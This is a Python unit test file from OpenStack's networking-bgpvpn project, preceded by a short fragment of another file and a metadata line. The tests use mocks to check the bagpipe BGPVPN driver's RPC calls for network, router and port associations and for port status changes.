def send(self, _, topic, **kwargs):
"""
Sends an event (blocking)
"""
self._events.send(topic, kwargs)
def post(self, _, topic, **kwargs):
"""
Posts an event (asynchronous)
"""
self._events.post(topic, kwargs)
| apache-2.0 | -5,305,253,819,971,711,000 | 25.290323 | 80 | 0.61227 | false |
openstack/networking-bgpvpn | networking_bgpvpn/tests/unit/services/bagpipe/test_bagpipe.py | 1 | 48898 | # Copyright (c) 2015 Orange.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
import webob.exc
from oslo_config import cfg
from neutron.api.rpc.handlers import resources_rpc
from neutron.db import agents_db
from neutron.db import db_base_plugin_v2
from neutron.debug import debug_agent
from neutron.plugins.ml2 import plugin as ml2_plugin
from neutron.plugins.ml2 import rpc as ml2_rpc
from neutron.tests.common import helpers
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import events
from neutron_lib import constants as const
from neutron_lib import context as n_context
from neutron_lib.plugins import directory
from networking_bgpvpn.neutron.services.service_drivers.bagpipe import bagpipe
from networking_bgpvpn.tests.unit.services import test_plugin
from networking_bagpipe.objects import bgpvpn as objs
def _expected_formatted_bgpvpn(id, net_id, rt=None, gateway_mac=None):
return {'id': id,
'network_id': net_id,
'l3vpn': {'import_rt': rt or mock.ANY,
'export_rt': rt or mock.ANY},
'gateway_mac': gateway_mac or mock.ANY}
class TestCorePluginWithAgents(db_base_plugin_v2.NeutronDbPluginV2,
agents_db.AgentDbMixin):
pass
class TestBagpipeCommon(test_plugin.BgpvpnTestCaseMixin):
def setUp(self, plugin=None,
driver=('networking_bgpvpn.neutron.services.service_drivers.'
'bagpipe.bagpipe.BaGPipeBGPVPNDriver')):
self.mocked_rpc = mock.patch(
'networking_bagpipe.agent.bgpvpn.rpc_client'
'.BGPVPNAgentNotifyApi').start().return_value
self.mock_attach_rpc = self.mocked_rpc.attach_port_on_bgpvpn
self.mock_detach_rpc = self.mocked_rpc.detach_port_from_bgpvpn
self.mock_update_rpc = self.mocked_rpc.update_bgpvpn
self.mock_delete_rpc = self.mocked_rpc.delete_bgpvpn
mock.patch(
'neutron_lib.rpc.get_client').start().return_value
if not plugin:
plugin = '%s.%s' % (__name__, TestCorePluginWithAgents.__name__)
super(TestBagpipeCommon, self).setUp(service_provider=driver,
core_plugin=plugin)
self.ctxt = n_context.Context('fake_user', self._tenant_id)
n_dict = {"name": "netfoo",
"tenant_id": self._tenant_id,
"admin_state_up": True,
"router:external": True,
"shared": True}
self.external_net = {'network':
self.plugin.create_network(self.ctxt,
{'network': n_dict})}
class AnyOfClass(object):
def __init__(self, cls):
self._class = cls
def __eq__(self, other):
return isinstance(other, self._class)
def __repr__(self):
return "AnyOfClass<%s>" % self._class.__name__
class TestBagpipeOVOPushPullMixin(object):
# tests for OVO-based push notifications go here
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_bgpvpn_update_name_only(self, mocked_push):
with self.bgpvpn() as bgpvpn:
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
{'bgpvpn': {'name': 'newname'}})
# check that no RPC push is done for BGPVPN objects
self.assertTrue(
mocked_push.call_count == 0 or
(not any([isinstance(ovo, objs.BGPVPNNetAssociation)
for ovo in mocked_push.mock_calls[0][1][1]]) and
not any([isinstance(ovo, objs.BGPVPNRouterAssociation)
for ovo in mocked_push.mock_calls[0][1][1]])
)
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_bgpvpn_update_rts_no_assoc(self, mocked_push):
with self.bgpvpn() as bgpvpn:
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
{'bgpvpn': {'route_targets': ['64512:43']}})
# check that no RPC push is done for BGPVPN objects
self.assertTrue(
mocked_push.call_count == 0 or
(not any([isinstance(ovo, objs.BGPVPNNetAssociation)
for ovo in mocked_push.mock_calls[0][1][1]]) and
not any([isinstance(ovo, objs.BGPVPNRouterAssociation)
for ovo in mocked_push.mock_calls[0][1][1]])
)
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, '_push')
def test_bgpvpn_update_delete_rts_with_assocs(self, mocked_push):
with self.bgpvpn(do_delete=False) as bgpvpn, \
self.network() as net, \
self.router(tenant_id=self._tenant_id) as router, \
self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id'],
do_disassociate=False), \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id'],
do_disassociate=False):
mocked_push.reset_mock()
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
{'bgpvpn': {'route_targets': ['64512:43']}})
mocked_push.assert_any_call(mock.ANY, 'BGPVPNNetAssociation',
mock.ANY, 'updated')
mocked_push.assert_any_call(mock.ANY, 'BGPVPNRouterAssociation',
mock.ANY, 'updated')
mocked_push.reset_mock()
# delete BGPVPN
self._delete('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'])
# after delete
mocked_push.assert_any_call(mock.ANY, 'BGPVPNNetAssociation',
mock.ANY, 'deleted')
mocked_push.assert_any_call(mock.ANY, 'BGPVPNRouterAssociation',
mock.ANY, 'deleted')
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_net_assoc_create_delete(self, mocked_push):
with self.network() as net, \
self.bgpvpn() as bgpvpn:
mocked_push.reset_mock()
with self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id']):
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'created')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNNetAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
# after net assoc delete
mocked_push.assert_called_once_with(mock.ANY, mock.ANY, 'deleted')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNNetAssociation)],
ovos_in_call
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_router_assoc_create_delete(self, mocked_push):
with self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn:
mocked_push.reset_mock()
with self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']):
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'created')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNRouterAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
# after router assoc delete
mocked_push.assert_called_once_with(mock.ANY, mock.ANY, 'deleted')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNRouterAssociation)],
ovos_in_call
)
@mock.patch.object(resources_rpc.ResourcesPushRpcApi, 'push')
def test_port_assoc_crud(self, mocked_push):
with self.port() as port, \
self.bgpvpn() as bgpvpn:
mocked_push.reset_mock()
with self.assoc_port(bgpvpn['bgpvpn']['id'],
port['port']['id']) as port_assoc:
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'created')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNPortAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
self._update(
('bgpvpn/bgpvpns/%s/port_associations' %
bgpvpn['bgpvpn']['id']),
port_assoc['port_association']['id'],
{'port_association': {'advertise_fixed_ips': False}})
mocked_push.assert_called_once_with(mock.ANY, mock.ANY,
'updated')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNPortAssociation)],
ovos_in_call
)
mocked_push.reset_mock()
# after port assoc delete
mocked_push.assert_called_once_with(mock.ANY, mock.ANY, 'deleted')
ovos_in_call = mocked_push.mock_calls[0][1][1]
self.assertEqual(
[AnyOfClass(objs.BGPVPNPortAssociation)],
ovos_in_call
)
class TestBagpipeServiceDriver(TestBagpipeCommon):
def test_create_bgpvpn_l2_fails(self):
bgpvpn_data = copy.copy(self.bgpvpn_data['bgpvpn'])
bgpvpn_data.update({"type": "l2"})
# Assert that an error is returned to the client
bgpvpn_req = self.new_create_request(
'bgpvpn/bgpvpns', bgpvpn_data)
res = bgpvpn_req.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPBadRequest.code,
res.status_int)
def test_create_bgpvpn_rds_fails(self):
bgpvpn_data = copy.copy(self.bgpvpn_data)
bgpvpn_data['bgpvpn'].update({"route_distinguishers": ["4444:55"]})
# Assert that an error is returned to the client
bgpvpn_req = self.new_create_request(
'bgpvpn/bgpvpns', bgpvpn_data)
res = bgpvpn_req.get_response(self.ext_api)
self.assertEqual(webob.exc.HTTPBadRequest.code,
res.status_int)
def test_bagpipe_update_bgpvpn_rds_fails(self):
with self.bgpvpn() as bgpvpn:
update_data = {'bgpvpn': {"route_distinguishers": ["4444:55"]}}
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
update_data,
expected_code=webob.exc.HTTPBadRequest.code)
show_bgpvpn = self._show('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'])
self.assertEqual([],
show_bgpvpn['bgpvpn']['route_distinguishers'])
def test_bagpipe_associate_net(self):
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
self.mock_update_rpc.reset_mock()
with self.assoc_net(id, net_id):
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_associate_external_net_failed(self):
net_id = self.external_net['network']['id']
with self.bgpvpn(tenant_id='another_tenant') as bgpvpn:
id = bgpvpn['bgpvpn']['id']
data = {'network_association': {'network_id': net_id,
'tenant_id': self._tenant_id}}
bgpvpn_net_req = self.new_create_request(
'bgpvpn/bgpvpns',
data=data,
fmt=self.fmt,
id=id,
subresource='network_associations')
res = bgpvpn_net_req.get_response(self.ext_api)
self.assertEqual(res.status_int, webob.exc.HTTPForbidden.code)
def test_bagpipe_associate_router(self):
with self.router(tenant_id=self._tenant_id) as router:
router_id = router['router']['id']
with self.subnet() as subnet:
with self.port(subnet=subnet) as port:
net_id = port['port']['network_id']
subnet_id = subnet['subnet']['id']
itf = self._router_interface_action('add', router_id,
subnet_id, None)
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
self.mock_update_rpc.reset_mock()
with self.assoc_router(id, router_id):
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(
id, net_id,
rt,
itf_port['mac_address']))
def test_bagpipe_disassociate_net(self):
mocked_delete = self.mocked_rpc.delete_bgpvpn
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
with self.assoc_net(id, net_id,
do_disassociate=False) as assoc:
mocked_delete.reset_mock()
del_req = self.new_delete_request(
'bgpvpn/bgpvpns',
id,
fmt=self.fmt,
subresource='network_associations',
sub_id=assoc['network_association']['id'])
res = del_req.get_response(self.ext_api)
if res.status_int >= 400:
raise webob.exc.HTTPClientError(code=res.status_int)
mocked_delete.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_update_bgpvpn_rt(self):
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn() as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = ['6543:21']
with self.assoc_net(id, net_id):
update_data = {'bgpvpn': {'route_targets': ['6543:21']}}
self.mock_update_rpc.reset_mock()
self._update('bgpvpn/bgpvpns',
bgpvpn['bgpvpn']['id'],
update_data)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_update_bgpvpn_with_router_assoc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']), \
self.port(subnet=subnet):
self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
update_data = {'bgpvpn': {'route_targets': ['6543:21']}}
self.mock_update_rpc.reset_mock()
self._update('bgpvpn/bgpvpns', bgpvpn['bgpvpn']['id'], update_data)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id']))
def test_bagpipe_delete_bgpvpn(self):
mocked_delete = self.mocked_rpc.delete_bgpvpn
with self.port() as port1:
net_id = port1['port']['network_id']
with self.bgpvpn(do_delete=False) as bgpvpn:
id = bgpvpn['bgpvpn']['id']
rt = bgpvpn['bgpvpn']['route_targets']
mocked_delete.reset_mock()
with self.assoc_net(id, net_id, do_disassociate=False):
self._delete('bgpvpn/bgpvpns', id)
mocked_delete.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(id, net_id, rt))
def test_bagpipe_delete_bgpvpn_with_router_assoc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn(do_delete=False) as bgpvpn, \
self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id'],
do_disassociate=False), \
self.port(subnet=subnet):
self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_delete_rpc.reset_mock()
self._delete('bgpvpn/bgpvpns', bgpvpn['bgpvpn']['id'])
self.mocked_rpc.delete_bgpvpn.assert_called_once_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id']))
def test_bagpipe_callback_to_rpc_update_port_after_router_itf_added(self):
driver = self.bgpvpn_plugin.driver
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn:
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
with self.assoc_router(bgpvpn['bgpvpn']['id'],
router['router']['id']), \
self.port(subnet=subnet) as port:
mac_address = port['port']['mac_address']
formatted_ip = (port['port']['fixed_ips'][0]['ip_address'] +
'/' + subnet['subnet']['cidr'].split('/')[-1])
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
expected = {
'gateway_ip': subnet['subnet']['gateway_ip'],
'mac_address': mac_address,
'ip_address': formatted_ip,
'gateway_mac': itf_port['mac_address']
}
expected.update(driver._format_bgpvpn_network_route_targets(
[bgpvpn['bgpvpn']]))
actual = driver._retrieve_bgpvpn_network_info_for_port(
self.ctxt, port['port'])
self.assertEqual(expected, actual)
def test_bagpipe_get_network_info_for_port(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.port(subnet=subnet) as port:
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
r = bagpipe.get_network_info_for_port(self.ctxt,
port['port']['id'],
net['network']['id'])
expected_ip = port['port']['fixed_ips'][0]['ip_address'] + "/24"
self.assertEqual({
'mac_address': port['port']['mac_address'],
'ip_address': expected_ip,
'gateway_ip': subnet['subnet']['gateway_ip'],
'gateway_mac': itf_port['mac_address']
}, r)
RT = '12345:1'
BGPVPN_INFO = {'mac_address': 'de:ad:00:00:be:ef',
'ip_address': '10.0.0.2',
'gateway_ip': '10.0.0.1',
'l3vpn': {'import_rt': [RT],
'export_rt': [RT]
},
'gateway_mac': None
}
class TestCorePluginML2WithAgents(ml2_plugin.Ml2Plugin,
agents_db.AgentDbMixin):
pass
class TestBagpipeServiceDriverCallbacks(TestBagpipeCommon,
TestBagpipeOVOPushPullMixin):
'''Check that receiving callbacks results in RPC calls to the agent'''
def setUp(self):
cfg.CONF.set_override('mechanism_drivers',
['logger', 'fake_agent'],
'ml2')
super(TestBagpipeServiceDriverCallbacks, self).setUp(
"%s.%s" % (__name__, TestCorePluginML2WithAgents.__name__))
self.port_create_status = 'DOWN'
self.plugin = directory.get_plugin()
self.plugin.start_rpc_listeners()
self.bagpipe_driver = self.bgpvpn_plugin.driver
self.patched_driver = mock.patch.object(
self.bgpvpn_plugin.driver,
'_retrieve_bgpvpn_network_info_for_port',
return_value=BGPVPN_INFO)
self.patched_driver.start()
# we choose an agent of type const.AGENT_TYPE_OFA
# because this is the type used by the fake_agent mech driver
helpers.register_ovs_agent(helpers.HOST, const.AGENT_TYPE_OFA)
helpers.register_l3_agent()
def _build_expected_return_active(self, port):
bgpvpn_info_port = BGPVPN_INFO.copy()
bgpvpn_info_port.update({'id': port['id'],
'network_id': port['network_id']})
return bgpvpn_info_port
def _build_expected_return_down(self, port):
return {'id': port['id'],
'network_id': port['network_id']}
def _update_port_status(self, port, status):
network_id = port['port']['network_id']
some_network = {'id': network_id}
self.plugin.get_network = mock.Mock(return_value=some_network)
self.plugin.update_port_status(self.ctxt, port['port']['id'],
status, helpers.HOST)
def test_bagpipe_callback_to_rpc_update_down2active(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port['port']),
helpers.HOST)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active2down(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port['port']),
helpers.HOST)
self.assertFalse(self.mock_attach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active2active(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_down2down(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_deleted(self):
with self.port(arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self.plugin.delete_port(self.ctxt, port['port']['id'])
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port['port']),
helpers.HOST)
self.assertFalse(self.mock_attach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active_ignore_net_ports(self):
with self.port(device_owner=const.DEVICE_OWNER_NETWORK_PREFIX,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_dont_ignore_probe_ports_compute(self):
with self.port(device_owner=debug_agent.DEVICE_OWNER_COMPUTE_PROBE,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port['port']),
helpers.HOST)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_dont_ignore_probe_ports_network(self):
with self.port(device_owner=debug_agent.DEVICE_OWNER_NETWORK_PROBE,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_active(port['port']),
helpers.HOST)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_down_ignore_net_ports(self):
with self.port(device_owner=const.DEVICE_OWNER_NETWORK_PREFIX,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_deleted_ignore_net_ports(self):
with self.port(device_owner=const.DEVICE_OWNER_NETWORK_PREFIX,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self.bagpipe_driver.registry_port_deleted(
None, None, None,
context=self.ctxt,
port_id=port['port']['id']
)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_active_ignore_external_net(self):
with self.subnet(network=self.external_net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_update_down_ignore_external_net(self):
with self.subnet(network=self.external_net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_bagpipe_callback_to_rpc_deleted_ignore_external_net(self):
with self.subnet(network=self.external_net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port:
self._update_port_status(port, const.PORT_STATUS_DOWN)
self.mock_attach_rpc.reset_mock()
self.mock_detach_rpc.reset_mock()
self.bagpipe_driver.registry_port_deleted(
None, None, None,
context=self.ctxt,
port_id=port['port']['id']
)
self.assertFalse(self.mock_attach_rpc.called)
self.assertFalse(self.mock_detach_rpc.called)
def test_delete_port_to_bgpvpn_rpc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port, \
mock.patch.object(self.plugin, 'get_port',
return_value=port['port']), \
mock.patch.object(self.plugin, 'get_network',
return_value=net['network']):
self.plugin.delete_port(self.ctxt, port['port']['id'])
self.mock_detach_rpc.assert_called_once_with(
mock.ANY,
self._build_expected_return_down(port['port']),
helpers.HOST)
def test_bagpipe_callback_to_rpc_update_port_router_itf_added(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.port(subnet=subnet) as port, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
mock.patch.object(self.bagpipe_driver, 'get_bgpvpn',
return_value=bgpvpn['bgpvpn']),\
mock.patch.object(bagpipe,
'get_router_bgpvpn_assocs',
return_value=[{
'bgpvpn_id': bgpvpn['bgpvpn']['id']
}]).start():
payload = events.DBEventPayload(
self.ctxt, resource_id=router['router']['id'],
metadata={'port': {'network_id': net['network']['id']}})
self.bagpipe_driver.registry_router_interface_created(
None, None, None, payload=payload
)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
port['port']['network_id']))
def test_bagpipe_callback_to_rpc_update_port_router_itf_removed(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.port(subnet=subnet) as port, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
mock.patch.object(self.bagpipe_driver, 'get_bgpvpn',
return_value=bgpvpn['bgpvpn']),\
mock.patch.object(bagpipe,
'get_router_bgpvpn_assocs',
return_value=[{
'bgpvpn_id': bgpvpn['bgpvpn']['id']
}]).start():
payload = events.DBEventPayload(
self.ctxt, metadata={
'network_id': port['port']['network_id'],
'port': {
'device_id': router['router']['id'],
'network_id': net['network']['id']}
})
self.bagpipe_driver.registry_router_interface_deleted(
None, None, None,
payload=payload
)
self.mock_delete_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
port['port']['network_id']))
def test_l3agent_add_remove_router_interface_to_bgpvpn_rpc(self):
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn() as bgpvpn, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}), \
mock.patch.object(bagpipe,
'get_router_bgpvpn_assocs',
return_value=[{
'bgpvpn_id': bgpvpn['bgpvpn']['id']
}]).start():
self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_update_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
net['network']['id']))
self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_delete_rpc.assert_called_once_with(
mock.ANY,
self.bagpipe_driver._format_bgpvpn(self.ctxt,
bgpvpn['bgpvpn'],
net['network']['id']))
def test_gateway_mac_info_rpc(self):
BGPVPN_INFO_GW_MAC = copy.copy(BGPVPN_INFO)
BGPVPN_INFO_GW_MAC.update(gateway_mac='aa:bb:cc:dd:ee:ff')
self.patched_driver.stop()
with self.network() as net, \
self.subnet(network=net) as subnet, \
self.router(tenant_id=self._tenant_id) as router, \
self.bgpvpn(route_targets=[RT]) as bgpvpn, \
self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**{portbindings.HOST_ID: helpers.HOST}) as port, \
self.assoc_net(bgpvpn['bgpvpn']['id'],
net['network']['id']), \
mock.patch.object(self.bgpvpn_plugin.driver,
'retrieve_bgpvpns_of_router_assocs'
'_by_network',
return_value=[{'type': 'l3',
'route_targets': [RT]}]
):
self._update_port_status(port, const.PORT_STATUS_ACTIVE)
itf = self._router_interface_action('add',
router['router']['id'],
subnet['subnet']['id'],
None)
itf_port = self.plugin.get_port(self.ctxt, itf['port_id'])
self.mock_update_rpc.assert_called_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id'],
[RT],
gateway_mac=itf_port['mac_address'])
)
self._router_interface_action('remove',
router['router']['id'],
subnet['subnet']['id'],
None)
self.mock_update_rpc.assert_called_with(
mock.ANY,
_expected_formatted_bgpvpn(bgpvpn['bgpvpn']['id'],
net['network']['id'],
[RT],
gateway_mac=None)
)
self.patched_driver.start()
def test_l2agent_rpc_to_bgpvpn_rpc(self):
#
# Test that really simulate the ML2 codepath that
# generate the registry events.
ml2_rpc_callbacks = ml2_rpc.RpcCallbacks(mock.Mock(), mock.Mock())
n_dict = {"name": "netfoo",
"tenant_id": self._tenant_id,
"admin_state_up": True,
"shared": False}
net = self.plugin.create_network(self.ctxt, {'network': n_dict})
subnet_dict = {'name': 'test_subnet',
'tenant_id': self._tenant_id,
'ip_version': 4,
'cidr': '10.0.0.0/24',
'allocation_pools': [{'start': '10.0.0.2',
'end': '10.0.0.254'}],
'enable_dhcp': False,
'dns_nameservers': [],
'host_routes': [],
'network_id': net['id']}
self.plugin.create_subnet(self.ctxt, {'subnet': subnet_dict})
p_dict = {'network_id': net['id'],
'tenant_id': self._tenant_id,
'name': 'fooport',
"admin_state_up": True,
"device_id": "tapfoo",
"device_owner": "not_me",
"mac_address": "de:ad:00:00:be:ef",
"fixed_ips": [],
"binding:host_id": helpers.HOST,
}
port = self.plugin.create_port(self.ctxt, {'port': p_dict})
ml2_rpc_callbacks.update_device_up(self.ctxt,
host=helpers.HOST,
